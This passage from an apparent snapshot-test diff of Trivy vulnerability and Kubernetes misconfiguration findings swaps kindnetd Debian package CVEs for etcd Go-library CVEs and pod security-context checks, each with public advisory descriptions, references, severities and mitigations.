'debian'", - "id": "CVE-2018-12886", - "installedVersion": "8.3.0-6", - "packageName": "libstdc++6", + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20210615035016-665e8c7367d1", + "packageName": "golang.org/x/sys", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-12886", - "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", - "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", - "https://www.cve.org/CVERecord?id=CVE-2018-12886", - "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", ], }, "category": "Vulnerability", - "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", + "name": "faccessat checks wrong group", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-12886", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-12886", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "value": "https://github.com/golang/go/issues/52313", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-15847", - "installedVersion": "8.3.0-6", - "packageName": "libstdc++6", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", - "https://access.redhat.com/security/cve/CVE-2019-15847", - "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", - "https://linux.oracle.com/cve/CVE-2019-15847.html", - "https://linux.oracle.com/errata/ELSA-2020-1864.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", - "https://www.cve.org/CVERecord?id=CVE-2019-15847", - ], - }, - "category": "Vulnerability", - "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-15847", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-15847", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202208-02", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-3843", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "fixedVersion": "0.3.7", + "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-38561", + "installedVersion": "v0.3.6", + "packageName": "golang.org/x/text", "references": [ - "http://www.securityfocus.com/bid/108116", - "https://access.redhat.com/security/cve/CVE-2019-3843", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", - "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", - "https://linux.oracle.com/cve/CVE-2019-3843.html", - "https://linux.oracle.com/errata/ELSA-2020-1794.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", - "https://security.netapp.com/advisory/ntap-20190619-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-3843", + "https://access.redhat.com/security/cve/CVE-2021-38561", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "https://deps.dev/advisory/OSV/GO-2021-0113", + "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "https://go.dev/cl/340830", + "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "https://groups.google.com/g/golang-announce", + "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "https://pkg.go.dev/golang.org/x/text/language", + "https://pkg.go.dev/vuln/GO-2021-0113", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2021-38561", ], }, "category": "Vulnerability", - "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "systemd: services with DynamicUser can create SUID/SGID binaries", + "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-3843", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/108116", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-3843", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", + "value": "https://avd.aquasec.com/nvd/cve-2021-38561", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", + "value": "https://access.redhat.com/security/cve/CVE-2021-38561", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-3843.html", + "value": "https://deps.dev/advisory/OSV/GO-2021-0113", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://go.dev/cl/340830", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", + "value": "https://pkg.go.dev/golang.org/x/text/language", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://pkg.go.dev/vuln/GO-2021-0113", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-3843", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-3844", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "fixedVersion": "0.3.8", + "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.6", + "packageName": "golang.org/x/text", "references": [ - "http://www.securityfocus.com/bid/108096", - "https://access.redhat.com/security/cve/CVE-2019-3844", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", - "https://linux.oracle.com/cve/CVE-2019-3844.html", - "https://linux.oracle.com/errata/ELSA-2020-1794.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", - "https://security.netapp.com/advisory/ntap-20190619-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-3844", + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", ], }, "category": "Vulnerability", - "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "systemd: services with DynamicUser can get new privileges and create SGID binaries", + "name": "ParseAcceptLanguage takes a long time to parse complex tags", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-3844", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/108096", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-3844", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-3844.html", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-3844", + "value": "https://ubuntu.com/security/notices/USN-5873-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "241-7~deb10u9", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-26604", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2023-26604", - "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", - "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", - "https://github.com/systemd/systemd/issues/5666", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", - "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", - "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", - "https://security.netapp.com/advisory/ntap-20230505-0009/", - "https://www.cve.org/CVERecord?id=CVE-2023-26604", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", ], }, - "category": "Vulnerability", - "description": "systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "privilege escalation via the less pager", + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-26604", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-26604", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'etcd' of Pod 'etcd-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", + ], + }, + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(Pod 'etcd-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "references": [ { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/5666", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230505-0009/", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-26604", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "241-7~deb10u8", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33910", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", - "https://access.redhat.com/security/cve/CVE-2021-33910", - "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", - "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", - "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", - "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", - "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", - "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", - "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", - "https://linux.oracle.com/cve/CVE-2021-33910.html", - "https://linux.oracle.com/errata/ELSA-2021-2717.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20211104-0008/", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2021-33910", - "https://www.debian.org/security/2021/dsa-4942", - "https://www.openwall.com/lists/oss-security/2021/07/20/2", - "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", ], }, - "category": "Vulnerability", - "description": "basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash", + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33910", - }, - { - "type": "URL", - "value": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + 